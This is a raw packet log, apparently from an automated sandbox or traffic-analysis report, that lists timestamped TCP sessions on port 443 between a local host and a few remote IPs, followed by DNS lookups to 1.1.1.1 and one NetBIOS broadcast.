                                                      Jan 10, 2025 09:28:07.420830965 CET49818443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:07.420842886 CET44349818139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:07.421830893 CET44349818139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:07.421912909 CET49818443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:07.422245026 CET49818443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:07.422302008 CET44349818139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:07.422348976 CET49818443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:07.422394991 CET49818443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:07.422400951 CET44349818139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:07.471230030 CET49817443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:07.471252918 CET49818443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:07.912374973 CET44349818139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:07.916395903 CET44349816139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:07.917352915 CET44349816139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:07.917483091 CET49816443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:07.917496920 CET44349816139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:07.954909086 CET49818443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:07.954921961 CET44349818139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:07.955662966 CET49818443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:07.955854893 CET44349818139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:07.955950022 CET49818443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:07.959546089 CET49819443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:07.959585905 CET44349819139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:07.959696054 CET49819443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:07.959996939 CET49819443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:07.960016012 CET44349819139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:07.970434904 CET49816443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:07.970454931 CET44349816139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:07.970617056 CET49816443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:07.970705032 CET44349816139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:07.970808029 CET49816443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:08.003403902 CET49820443192.168.2.9216.58.212.132
                                                      Jan 10, 2025 09:28:08.003465891 CET44349820216.58.212.132192.168.2.9
                                                      Jan 10, 2025 09:28:08.003590107 CET49820443192.168.2.9216.58.212.132
                                                      Jan 10, 2025 09:28:08.003925085 CET49820443192.168.2.9216.58.212.132
                                                      Jan 10, 2025 09:28:08.003942013 CET44349820216.58.212.132192.168.2.9
                                                      Jan 10, 2025 09:28:08.638124943 CET44349820216.58.212.132192.168.2.9
                                                      Jan 10, 2025 09:28:08.638479948 CET49820443192.168.2.9216.58.212.132
                                                      Jan 10, 2025 09:28:08.638504982 CET44349820216.58.212.132192.168.2.9
                                                      Jan 10, 2025 09:28:08.638973951 CET44349820216.58.212.132192.168.2.9
                                                      Jan 10, 2025 09:28:08.639303923 CET49820443192.168.2.9216.58.212.132
                                                      Jan 10, 2025 09:28:08.639403105 CET44349820216.58.212.132192.168.2.9
                                                      Jan 10, 2025 09:28:08.685493946 CET49820443192.168.2.9216.58.212.132
                                                      Jan 10, 2025 09:28:08.979283094 CET44349819139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:08.979648113 CET49819443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:08.979672909 CET44349819139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:08.980643988 CET44349819139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:08.981103897 CET49819443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:08.981103897 CET49819443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:08.981178999 CET44349819139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:08.981350899 CET49819443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:09.023323059 CET44349819139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:09.027192116 CET49819443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:09.027199984 CET44349819139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:09.073097944 CET49819443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:09.780637980 CET44349819139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:09.780909061 CET44349819139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:09.780983925 CET49819443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:09.780999899 CET44349819139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:09.783735037 CET49819443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:09.783790112 CET44349819139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:09.783970118 CET44349819139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:09.784037113 CET49819443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:09.831403017 CET44349817139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:09.876724005 CET49817443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:09.876738071 CET44349817139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:09.922714949 CET49817443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:09.922725916 CET44349817139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:09.968928099 CET49817443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:10.100457907 CET44349817139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:10.153556108 CET49817443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:10.153568029 CET44349817139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:10.154299021 CET49817443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:10.154445887 CET44349817139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:10.154514074 CET49817443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:10.158226967 CET49821443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:10.158282995 CET44349821139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:10.158348083 CET49821443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:10.158552885 CET49821443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:10.158570051 CET44349821139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:11.151047945 CET44349821139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:11.151658058 CET49821443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:11.151671886 CET44349821139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:11.154758930 CET44349821139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:11.154861927 CET49821443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:11.155323982 CET49821443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:11.155386925 CET44349821139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:11.155807972 CET49821443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:11.155814886 CET44349821139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:11.201965094 CET49821443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:11.222017050 CET49822443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:11.222064018 CET44349822139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:11.222176075 CET49822443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:11.222722054 CET49822443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:11.222743034 CET44349822139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:11.967545033 CET44349821139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:12.015209913 CET49821443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:12.015239000 CET44349821139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:12.061634064 CET49821443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:12.102022886 CET44349821139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:12.155333996 CET49821443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:12.208689928 CET44349822139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:12.210222006 CET49822443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:12.210251093 CET44349822139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:12.211379051 CET44349822139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:12.211488008 CET49822443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:12.217211962 CET49822443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:12.217343092 CET44349822139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:12.220500946 CET49822443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:12.220510960 CET44349822139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:12.220711946 CET49822443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:12.236577034 CET44349821139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:12.263325930 CET44349822139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:12.264723063 CET49822443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:12.280515909 CET49821443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:12.280531883 CET44349821139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:12.281816006 CET49821443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:12.281917095 CET44349821139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:12.282100916 CET49821443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:12.962249994 CET44349822139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:13.015002966 CET49822443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:13.015034914 CET44349822139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:13.061858892 CET49822443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:13.093389988 CET44349822139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:13.139997959 CET49822443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:13.140017986 CET44349822139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:13.140728951 CET49822443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:13.140851021 CET44349822139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:13.140908003 CET49822443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:13.145023108 CET49823443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:13.145066977 CET44349823139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:13.145159960 CET49823443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:13.146028996 CET49823443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:13.146042109 CET44349823139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:14.136113882 CET44349823139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:14.136461020 CET49823443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:14.136482954 CET44349823139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:14.137563944 CET44349823139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:14.137645006 CET49823443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:14.137972116 CET49823443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:14.138034105 CET44349823139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:14.138108015 CET49823443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:14.179323912 CET44349823139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:14.186589003 CET49823443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:14.186598063 CET44349823139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:14.233496904 CET49823443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:14.758084059 CET44349747139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:14.811580896 CET49747443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:14.885575056 CET44349747139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:14.934670925 CET44349823139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:14.934890985 CET44349823139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:14.935245037 CET49823443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:14.935278893 CET44349823139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:14.936140060 CET49823443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:14.936197996 CET44349823139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:14.936270952 CET49823443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:14.936414957 CET49747443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:14.936428070 CET44349747139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:14.937206984 CET49747443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:14.937268019 CET44349747139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:14.937338114 CET49747443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:14.940057993 CET49824443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:14.940088987 CET44349824139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:14.940176964 CET49824443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:14.940524101 CET49824443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:14.940536022 CET44349824139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:15.926084995 CET44349824139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:15.926382065 CET49824443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:15.926399946 CET44349824139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:15.927465916 CET44349824139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:15.927527905 CET49824443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:15.927855968 CET49824443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:15.927922010 CET44349824139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:15.928019047 CET49824443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:15.928028107 CET44349824139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:15.967665911 CET49824443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:16.160008907 CET44349737139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:16.160134077 CET44349737139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:16.160254002 CET49737443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:17.891843081 CET49737443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:17.891866922 CET44349737139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:18.575436115 CET44349820216.58.212.132192.168.2.9
                                                      Jan 10, 2025 09:28:18.575619936 CET44349820216.58.212.132192.168.2.9
                                                      Jan 10, 2025 09:28:18.575686932 CET49820443192.168.2.9216.58.212.132
                                                      Jan 10, 2025 09:28:19.876097918 CET49820443192.168.2.9216.58.212.132
                                                      Jan 10, 2025 09:28:19.876120090 CET44349820216.58.212.132192.168.2.9
                                                      Jan 10, 2025 09:28:23.264014006 CET49826443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:23.264061928 CET44349826139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:23.264276981 CET49826443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:23.266988039 CET49826443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:23.267003059 CET44349826139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:24.255322933 CET44349826139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:24.255837917 CET49826443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:24.255858898 CET44349826139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:24.256838083 CET44349826139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:24.256915092 CET49826443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:24.257245064 CET49826443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:24.257303953 CET44349826139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:24.257399082 CET49826443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:24.257406950 CET44349826139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:24.257422924 CET49826443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:24.299345016 CET44349826139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:24.312041998 CET49826443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:24.742898941 CET44349826139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:24.796225071 CET49826443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:24.796242952 CET44349826139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:24.843250990 CET49826443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:24.872776985 CET44349826139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:24.921298027 CET49826443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:24.921322107 CET44349826139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:24.922157049 CET49826443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:24.922270060 CET44349826139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:24.922390938 CET49826443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:27.081717968 CET4434970613.107.246.45192.168.2.9
                                                      Jan 10, 2025 09:28:27.081844091 CET4434970613.107.246.45192.168.2.9
                                                      Jan 10, 2025 09:28:27.081886053 CET4434970613.107.246.45192.168.2.9
                                                      Jan 10, 2025 09:28:27.081938028 CET49706443192.168.2.913.107.246.45
                                                      Jan 10, 2025 09:28:27.082092047 CET49706443192.168.2.913.107.246.45
                                                      Jan 10, 2025 09:28:27.082854033 CET49706443192.168.2.913.107.246.45
                                                      Jan 10, 2025 09:28:27.087677002 CET4434970613.107.246.45192.168.2.9
                                                      Jan 10, 2025 09:28:27.170306921 CET49827443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:27.170361996 CET44349827139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:27.170454025 CET49827443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:27.171049118 CET49827443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:27.171065092 CET44349827139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:27.172892094 CET49828443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:27.172944069 CET44349828139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:27.173022032 CET49828443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:27.173434973 CET49828443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:27.173455954 CET44349828139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:28.169208050 CET44349828139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:28.169605970 CET49828443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:28.169640064 CET44349828139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:28.173367977 CET44349828139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:28.173460007 CET49828443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:28.173796892 CET49828443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:28.173860073 CET44349828139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:28.173948050 CET49828443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:28.173959970 CET44349828139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:28.173993111 CET49828443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:28.178731918 CET44349827139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:28.178922892 CET49827443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:28.178937912 CET44349827139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:28.180052996 CET44349827139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:28.180352926 CET49827443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:28.180464983 CET49827443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:28.180526018 CET44349827139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:28.180533886 CET49827443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:28.180635929 CET44349827139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:28.215339899 CET44349828139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:28.216561079 CET49828443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:28.232259989 CET49827443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:29.796417952 CET44349827139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:29.847033978 CET49827443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:29.933227062 CET44349827139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:29.988859892 CET49827443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:29.988888025 CET44349827139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:30.035974979 CET49827443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:30.066389084 CET44349827139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:30.113523960 CET49827443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:30.113584042 CET44349827139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:30.114768028 CET49827443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:30.115103006 CET44349827139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:30.115200043 CET49827443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:30.118262053 CET49829443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:30.118314028 CET44349829139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:30.118386984 CET49829443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:30.118619919 CET49829443192.168.2.9139.59.30.193
                                                      Jan 10, 2025 09:28:30.118635893 CET44349829139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:31.118943930 CET44349829139.59.30.193192.168.2.9
                                                      Jan 10, 2025 09:28:31.170974016 CET49829443192.168.2.9139.59.30.193
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jan 10, 2025 09:27:03.632512093 CET53553101.1.1.1192.168.2.9
                                                      Jan 10, 2025 09:27:03.672785997 CET53584591.1.1.1192.168.2.9
                                                      Jan 10, 2025 09:27:04.679358959 CET53519381.1.1.1192.168.2.9
                                                      Jan 10, 2025 09:27:07.938894033 CET5509353192.168.2.91.1.1.1
                                                      Jan 10, 2025 09:27:07.939173937 CET5486353192.168.2.91.1.1.1
                                                      Jan 10, 2025 09:27:07.945880890 CET53550931.1.1.1192.168.2.9
                                                      Jan 10, 2025 09:27:07.946273088 CET53548631.1.1.1192.168.2.9
                                                      Jan 10, 2025 09:27:09.495260000 CET5786753192.168.2.91.1.1.1
                                                      Jan 10, 2025 09:27:09.495408058 CET5065853192.168.2.91.1.1.1
                                                      Jan 10, 2025 09:27:10.147182941 CET5126753192.168.2.91.1.1.1
                                                      Jan 10, 2025 09:27:10.147358894 CET5185053192.168.2.91.1.1.1
                                                      Jan 10, 2025 09:27:10.178637028 CET53518501.1.1.1192.168.2.9
                                                      Jan 10, 2025 09:27:10.178675890 CET53512671.1.1.1192.168.2.9
                                                      Jan 10, 2025 09:27:12.348932981 CET6430553192.168.2.91.1.1.1
                                                      Jan 10, 2025 09:27:12.349131107 CET5550653192.168.2.91.1.1.1
                                                      Jan 10, 2025 09:27:12.380867004 CET53643051.1.1.1192.168.2.9
                                                      Jan 10, 2025 09:27:12.384977102 CET53555061.1.1.1192.168.2.9
                                                      Jan 10, 2025 09:27:16.690385103 CET5925853192.168.2.91.1.1.1
                                                      Jan 10, 2025 09:27:16.690538883 CET6421953192.168.2.91.1.1.1
                                                      Jan 10, 2025 09:27:16.789473057 CET6397853192.168.2.91.1.1.1
                                                      Jan 10, 2025 09:27:16.789695978 CET5682453192.168.2.91.1.1.1
                                                      Jan 10, 2025 09:27:16.825143099 CET53639781.1.1.1192.168.2.9
                                                      Jan 10, 2025 09:27:16.831720114 CET53568241.1.1.1192.168.2.9
                                                      Jan 10, 2025 09:27:16.910480022 CET53642191.1.1.1192.168.2.9
                                                      Jan 10, 2025 09:27:16.959021091 CET53592581.1.1.1192.168.2.9
                                                      Jan 10, 2025 09:27:18.868490934 CET6079753192.168.2.91.1.1.1
                                                      Jan 10, 2025 09:27:18.868630886 CET5031653192.168.2.91.1.1.1
                                                      Jan 10, 2025 09:27:18.880986929 CET53607971.1.1.1192.168.2.9
                                                      Jan 10, 2025 09:27:18.907530069 CET53503161.1.1.1192.168.2.9
                                                      Jan 10, 2025 09:27:19.640460014 CET5829753192.168.2.91.1.1.1
                                                      Jan 10, 2025 09:27:19.640670061 CET6433553192.168.2.91.1.1.1
                                                      Jan 10, 2025 09:27:19.641794920 CET6310153192.168.2.91.1.1.1
                                                      Jan 10, 2025 09:27:19.642008066 CET6236853192.168.2.91.1.1.1
                                                      Jan 10, 2025 09:27:19.647208929 CET53582971.1.1.1192.168.2.9
                                                      Jan 10, 2025 09:27:19.647468090 CET53643351.1.1.1192.168.2.9
                                                      Jan 10, 2025 09:27:19.655481100 CET53623681.1.1.1192.168.2.9
                                                      Jan 10, 2025 09:27:19.656419992 CET53631011.1.1.1192.168.2.9
                                                      Jan 10, 2025 09:27:20.597481966 CET5419053192.168.2.91.1.1.1
                                                      Jan 10, 2025 09:27:20.597632885 CET5475953192.168.2.91.1.1.1
                                                      Jan 10, 2025 09:27:20.604216099 CET53547591.1.1.1192.168.2.9
                                                      Jan 10, 2025 09:27:20.604243040 CET53541901.1.1.1192.168.2.9
                                                      Jan 10, 2025 09:27:21.565428972 CET5825253192.168.2.91.1.1.1
                                                      Jan 10, 2025 09:27:21.565615892 CET6018753192.168.2.91.1.1.1
                                                      Jan 10, 2025 09:27:21.572375059 CET53601871.1.1.1192.168.2.9
                                                      Jan 10, 2025 09:27:21.572784901 CET53582521.1.1.1192.168.2.9
                                                      Jan 10, 2025 09:27:21.584994078 CET53592521.1.1.1192.168.2.9
                                                      Jan 10, 2025 09:27:30.675410986 CET5510953192.168.2.91.1.1.1
                                                      Jan 10, 2025 09:27:30.675652981 CET6150253192.168.2.91.1.1.1
                                                      Jan 10, 2025 09:27:30.902877092 CET53551091.1.1.1192.168.2.9
                                                      Jan 10, 2025 09:27:30.941176891 CET53615021.1.1.1192.168.2.9
                                                      Jan 10, 2025 09:27:39.444681883 CET6060453192.168.2.91.1.1.1
                                                      Jan 10, 2025 09:27:39.444875002 CET6509253192.168.2.91.1.1.1
                                                      Jan 10, 2025 09:27:39.798648119 CET53606041.1.1.1192.168.2.9
                                                      Jan 10, 2025 09:27:39.867582083 CET53650921.1.1.1192.168.2.9
                                                      Jan 10, 2025 09:27:40.676244974 CET53637261.1.1.1192.168.2.9
                                                      Jan 10, 2025 09:27:40.901681900 CET6481353192.168.2.91.1.1.1
                                                      Jan 10, 2025 09:27:40.901911020 CET6374753192.168.2.91.1.1.1
                                                      Jan 10, 2025 09:27:41.275573015 CET53637471.1.1.1192.168.2.9
                                                      Jan 10, 2025 09:27:41.304016113 CET53648131.1.1.1192.168.2.9
                                                      Jan 10, 2025 09:27:43.005208015 CET5022853192.168.2.91.1.1.1
                                                      Jan 10, 2025 09:27:43.005208015 CET5416453192.168.2.91.1.1.1
                                                      Jan 10, 2025 09:27:43.227997065 CET53541641.1.1.1192.168.2.9
                                                      Jan 10, 2025 09:27:43.306703091 CET53502281.1.1.1192.168.2.9
                                                      Jan 10, 2025 09:27:43.729995966 CET5048953192.168.2.91.1.1.1
                                                      Jan 10, 2025 09:27:43.730134010 CET5021853192.168.2.91.1.1.1
                                                      Jan 10, 2025 09:27:43.838659048 CET53504891.1.1.1192.168.2.9
                                                      Jan 10, 2025 09:27:43.839272022 CET53502181.1.1.1192.168.2.9
                                                      Jan 10, 2025 09:27:44.011248112 CET53525971.1.1.1192.168.2.9
                                                      Jan 10, 2025 09:27:46.529592037 CET138138192.168.2.9192.168.2.255
                                                      Jan 10, 2025 09:27:49.839915037 CET5652753192.168.2.91.1.1.1
                                                      Jan 10, 2025 09:27:49.840156078 CET5232253192.168.2.91.1.1.1
